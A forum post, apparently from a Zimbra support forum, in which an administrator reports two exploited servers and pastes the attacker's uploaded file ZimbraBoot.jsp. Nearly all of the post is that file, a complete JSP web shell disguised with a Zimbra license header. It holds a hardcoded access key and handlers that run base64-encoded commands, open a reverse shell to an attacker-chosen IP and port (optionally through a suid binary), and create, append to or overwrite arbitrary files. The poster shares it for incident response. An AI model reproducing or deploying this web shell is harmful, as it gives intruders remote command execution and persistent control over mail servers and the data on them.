If you have information how to doublecheck if the system is cleanrobertvon wrote:Hi, we also get non newsletter.
Two of our server were exploited because of the vulnerability.
At this time AFAIK the attacker uploaded a malicious file called ZimbraBoot.jsp in /opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp
after the patch, I will be happy to read it.
This is file ZimbraBoot.jsp
Code: Select all
<!-- * ***** BEGIN LICENSE BLOCK *****
* Zimbra Collaboration Suite Web Client
* Copyright (C) 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021, 2022 Synacor, Inc.
*
* This program is free software: you can redistribute it and/or modify it under
* the terms of the GNU General Public License as published by the Free Software Foundation,
* version 2 of the License.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
* You should have received a copy of the GNU General Public License along with this program.
* If not, see <https://www.gnu.org/licenses/>.
* ***** END LICENSE BLOCK *****
-->
<%@ page import="java.io.*, java.util.Base64, java.nio.file.*, java.lang.*, java.io.*, java.net.*, java.util.*" %>
<% String output = "";
class StreamConnector extends Thread {
InputStream wz;
OutputStream yr;
StreamConnector(InputStream wz, OutputStream yr) {
this.wz = wz;
this.yr = yr;
}
public void run() {
BufferedReader r = null;
BufferedWriter w = null;
try {
r = new BufferedReader(new InputStreamReader(wz));
w = new BufferedWriter(new OutputStreamWriter(yr));
char buffer[] = new char[8192];
int length;
while((length = r.read(buffer, 0, buffer.length)) > 0) {
w.write( buffer, 0, length );
w.flush();
}
} catch( Exception e ) { }
try {
if (r != null) {
r.close();
}
if (w != null) {
w.close();
}
} catch( Exception e ) { }
}
}
String key = request.getParameter("key");
if (key != null && key.equals("fomggpztgpdbyvftnpafbjbevpjqfwemt")) {
String action = request.getParameter("action");
if (action != null) {
if (action.equals("append")) {
String file = request.getParameter("file");
if (file != null) {
String textBase64 = request.getParameter("text");
if (textBase64 != null) {
String text = new String(Base64.getDecoder().decode(textBase64));
try {
Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.APPEND);
} catch(IOException e) {
e.printStackTrace();
} output+="Appended!";
}
}
} else if (action.equals("exec")) {
String cmdBase64 = request.getParameter("cmd");
if (cmdBase64 != null) {
byte[] bytesEncoded = Base64.getDecoder().decode(cmdBase64);
String cmd = new String(bytesEncoded);String s = null;
try {
output += "Exec res: ";
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
} catch(IOException e) {
e.printStackTrace();
}
}
} else if (action.equals("sh")) {
String ip = request.getParameter("ip");
if (ip != null) {
String port = request.getParameter("port");
if (port != null) {
try {
String suid = request.getParameter("suid");
StringBuffer shell = new StringBuffer();
if (suid == null) {
shell.append("/bin/sh");
} else {
shell.append(suid);
shell.append(" -p");
}
Socket socket = new Socket(ip, Integer.parseInt(port));
Process process = Runtime.getRuntime().exec(shell.toString());
new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();
new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();
out.println("port opened on " + socket);
} catch( Exception e ) { }
}
}
} else if (action.equals("rewrite")) {
String file = request.getParameter("file");
if (file != null) {
String textBase64 = request.getParameter("text");
if (textBase64 != null) {
String text = new String(Base64.getDecoder().decode(textBase64));
try {
Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.TRUNCATE_EXISTING);
} catch(IOException e) {
e.printStackTrace();
}
output+="Rewritten!";
}
}
} else if (action.equals("create")) {
String file = request.getParameter("file");
if (file != null) {
String textBase64 = request.getParameter("text");
if (textBase64 != null) {
String text = new String(Base64.getDecoder().decode(textBase64));
try {
Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.CREATE);
} catch(IOException e) {
e.printStackTrace();
}
output+="Created!";
}
}
}
}
}%><%=output %>